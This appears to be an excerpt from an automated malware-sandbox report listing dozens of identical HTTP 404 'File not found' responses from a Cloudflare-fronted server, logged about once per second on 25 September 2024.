Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=moiXY1vlYQHlk5ZuybvaRpxNQ6%2BdlTjTOonMBAj71MxXrujiFabEmx%2FD8Rvh9XHWgmx8T9MfDzsFP1l22oEsKDoaPh0giLRjffVPPkAtLggujYXKm2MUmQUlRupYiA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89985d7d6472bc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwSKl9u36nZAANMXUlEtA5DFHzvTAZOuDIKu7oRrQ9KvcCH3MTTIROYrwQuzzSsi9BUssSCSawJZWrH%2FeOQ0n9x8hahldEP4U78p%2FOkATLkc2Y3aIWgM3U8BBIHjAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899862abd97d00-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMi%2FZWChQp2LqquGMkMv42SVRnjmNqxStpkbJ3fDdos43BxY0YcpwoSYBrD4sujV1nfhK3UM5cinr3wZh6xLBZ2M%2FfowOTYpvf%2F5nnsNYcuOwTt2iIOoC1AAVK1Pbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899868b986c325-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yFrQkPkLamDld5W5wriiNQgmC%2BSo9loJFEC8KW6YHzDjC5z4nMUMHvjq%2Fc8Pmbb0CCljcTlfZaOzVln74RXvSMnvvuY2a%2BrSY%2FT7%2B03IrFFasZZLiVaMl3%2BIrIgYbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89986e7fd24337-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OVG5YiCMrV84bJ7Zw1%2Flvx%2FtxNuYU7A4O4mu5oqLSc5mCpfTw1272OBzxzh4TkOtTwyTrS3KVUNA1qMwrtjDs9G3a2oj5h1WgahD5v0mNEXV2SV8AiPG54MF0T8qA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998738e6d8ca2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmR17Gc5eQ3h8YKUqWePUNU5PpUhhbkOvO7guUo4MUnpFNjla6bH3ur0SryQStd%2FJ7myiw0gfIIFhbFOX2trQ2mxchGnqyRZMWZlFwvGNa2qIERCBeuX%2BPiCx46uaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899878aa494315-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbyJTwhEpqqdBGaRDsIWx3ZrpPgk3eS5XfLRlvdYek8gx0AEFAbnqYLoViXzOKJPICN%2BxyB9OC%2BTc5WHZb1fNXLQ46ECeWTOs%2FHgw3wGkwaTHw65nPobkhzkXnlAtA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89987dbf7743dc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlMZDf%2Bn4D65VkD1pzFMRELFZ87KEWLz5ix6NhcZ522XTP%2Bflofa%2FAZz6TdaC568npLz%2Bp8BMqZvJeSpZxB6xtPNF4pseQUuj7DpQ6ETlB%2BNytHtURq1RgsPkwARcQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899882fce30fa4-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WNY2y%2B2%2Bf%2F8rx3m%2BVYe1dw0%2FQpXGXSI5piq2XkZwyrwbDz71Tn9BoRcH22JBq1uFaDOLzTPtB0W%2Fe8VYJafFLfZz5Gr1pOPSzJbXbRxqqvWktydERy4VeKOeMiJxQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998882bff42c8-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dc0eKRu3oFLXAXXcg5rARrFFW%2BnRB3PDovlES0eNAaRwQSATtF3Nz5Bf6MndH1RajZ9CYTIYsBYmIg3KfJiclAb2o%2B37nedEn4wkUKMucRnK2W3ndaVbRfyVYKAf1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89988d7c8543d9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hlH1SuVawJz9c0QLlwbrciqZo6hamSq1uBOUAvXoF%2B7wbikmWOkEc%2FlDb5oE8DEvnJUJ731SdQjaUq3OlHfThEkfGu35K831TW4f5Gwp59luQMlYJDMYRfs%2Beviy9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899892a9ffc337-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utpWafjgdT33PSeJv9PBPTrO8ppnfQ%2FsHsbdj9MI9Gb4DltL8%2FXMZPpmzK2N2TS5elL8JJn2iCjP7e7iUvxRRhIR3%2BltLj83wE%2BJivLWUW2OHSEv%2BL71ZBJcFxqUHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899897efd043f1-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNlHw6UCTZzfd0jbLW8bVW2x0RX5Cx%2B0NU9UWPL48iIwHSggQjv81Vg3VR6gRIaQHXdf04WCIoaQs43iPTgJnl2vi9qX0osuWCihXLevhda%2FqyPiqGuxD2aYTFDmvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89989d0d0d42d7-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1502YAANubG45hwi3fZHV9Sh7MSxbejuV06sMcf7wg3Ue2%2BXUzes0yZVhibASG%2F3WvVV%2FHRZ0v8fwnkeBFLi00qG6pkV1HXtdLD9gYLUSWJtMGQYVJa5vZ8PXqxTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998a22d374392-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93Oq53JWLIlwjNXlLWqb9uPPw%2B%2BWvdOUwDP1BB8zlaqyMm7SYK4Mpken6vWnuh0JPD8ic6B8TIpfXY37bZONk%2BF6c%2BVZpQgA0yx5lalTZFS%2FTkc5OhPyZ6zTltFXkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998a74f9e42a5-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z61VtDw2Wvo1l3YFqOShQowtO04M%2B8UPW0Y7dlzs6ktHdVaJhscCwFSkTLpCes12J4F2A0%2BtnWiZv6HEy53Vkrw0JXbeXPJst8StWUA8dSlpyErWyWOr%2F3T1ZW%2FhLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998accb0e7d1c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLIudn5PxlJJMKTx9fE7hd1p1HEnwTbKS4M5l%2FXRBLNr7iMGZCMOblWGCteP0VOYMCf9XMFuo7MG1t3%2BZDau0OZ2yruR9i0YCWSECcjeXOjXhCl%2BkRb3J8jSjxfjYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998b228dd7281-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNSAGjfccAqxPfVdIS0Vv0aphrP%2BbIYycm6J1Ix1Honq2ztU4T%2BbNFc8iJcryd7FXZXFiaIMf4nuXKf%2B%2BEobSFOIkRFGUJvvghV7OnuSI7CZ4eAuq3b0dt3HNgO8yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998b788687cff-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQKMpWg0eXPNmPQ0NtRTlXYGo8jh%2FHEeEtkG16temtj8S%2BBaLV%2FW7toPlydc51gUXAeN1mPeyFZSgsu7ODHZyWWg2xODuqJe2iz9uQ8R%2FraNu1EHICv59YZW2pwb5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998bc9d1742a5-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R92%2FKfjNwZHmAHiJpqB5SJOV7DT62nePq26wPMXBDv6ukIgXiHcCLrrzD9w1bcFSL7XBQk22Vdp1ecpMMwRcyFhDNlzAsiaDfOVYqkrLEAnk%2BEg%2BsYYdQ5910zfSbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998c1b8f25e78-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5L8WORFOBBkAkjRTHmov8FdEyO3vV5CB7RZZV9vUjkzWdb8VYK9hhWHqd2%2Fbz08EGvvXn1CTxD20q20F4aexqkkQnYcf8pok4oOz9X6%2Be7nH4YKz3BLctRJkwlhGg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998c6de9a8c12-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpLViIHoc53tjJCFDg%2BGODomOLKqGBRp51ZuKPmpF4KkVC7NLhWceZ9ufQgTZc5g%2FSCB8NaDApGsTFavpJ%2BvItBoxS2bdN%2FSH4JNkbRuOpAltFgVb2NCq9bXkhi9LQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998cc6bdd8cbd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFSXSNRJv3RBkcQT3HQ4NSLO7S7OIOS981Ef9C7rqEzf5Oci7RAohTjTHcFXOe4Zlhfq6kjEwSeZovga2rRAUovyDn5kgYKGKzxnaH%2BtWwOig%2FhCqS8JV3X66L%2BWNQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998d19be841d2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3blxiqZv7%2BHAjoBK8RwY0e2%2FzSvy7abL%2BIcd1talAjK23czk0g4mYtOhzK%2Bh%2FUcYBTXIStrFXbdPtosp4XM63vmhTceVdmm5LS00%2BfaLsjDObBkOmIX89j1wDUiEhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998d69fef5e5f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXG7r5L21clLv5eWf95MLCFwYSMotEARVK%2FaP1YQNYWXF2FoHoRYY0qhC6lkhFPflXLWG3kg0eluETGYMPL1FhDRBSErm4Ni4fjZTUjoRDwUk6AozwBbPAj4l4xPvQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998dcaddfc324-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g%2Bu8iU7RVnw1H3O3WsJKk6HYfQY5E0tO1uroo4uVcqHzrZaFHb%2BYVND7U3m%2B1miyYPJi4wjxgAUi3KpiCvDXVtA%2FPwaCXTx84MbQjkwNDPbvKSQv9j2jvqDcLakFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998e1f86843fe-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq0zNyrutuio9j8nmCVRNhIS11cpB6SwCqEEt100K1XL21xjHEVmklKlNngDERwIMKAts5%2FIT3mgkke%2BjNZvcVvP7CG5MHgcMFj%2FBPEiLHtA4n3kYoT%2B%2Fvd4OStSJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998e8aaac7287-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HiCoRu50K94YqKMNXS5S0RkBEXA8LcnROofghhbTZWFGu%2FK0vyNXE1eMkhDMLjsCxtkTZ2F5ASasqMuOk7Z6p9pbcpDK%2BqvqMxG9vLdvU3lDwUcRuP8uHg0%2Ft0OAMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998ee1be94332-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qr5pKYQ6%2F5OLfsG%2FEDe79%2BwxzCUBiOMlwNpJhJQipYAa3J8aIyL6cPYAaoeCnwavV4KesEdNwwcUJY92zGhdOc9qlnKmVDtq%2FSyIlVSeHBZdrp%2FtswvXieCu%2BHRUGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998f36b687c93-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pxwNA5SuCsl4qq09zRcrlpxL85arzvbxIeEb%2FIAyJtVhAVJkO5tzJUBL4IcOjhRbMhWc6gXlX8%2FXgDPl5lge0WbkdmTcPP07ILu7I%2Feppe6dzlwujS4WEim%2FSGdRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998f88c4b42c7-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsYbMJdF%2FKgpwwcPl9bC%2F2y4exCPTYkp9Z8yjBoBwTU8mTtRGcOTKatQDlmkHJFfZJELnO1BS39j0PF%2BI2ZgknxLEq39ziFQMsBPZ1I6uTlX%2BnzLrV7CrSP3f5yv9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8998fdde1343ed-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2FBmmKVx5ZmWofONc72GEepNlLupNVwqrPytvvPE9VYOveH22R%2BZDPcWkS6mjDrBhe%2FMtA1dgil9X7yB6skSpOszbcFsI6FB0vTa5qo399Pdfy2yPwAr0V7ME5kJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899902fa4343c1-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8x5HmqQRp2BvBbbVzS6B02LCjxLojHG74mNK2KnvJSO1ba3azho7SmADP5yGgfZrbMk02pXXJzZ0yk7mfW8irBrsR%2FnG3zBkNxqSyJe7JcHMMgdI6FOc2r3RXRxGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899907fba242cb-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
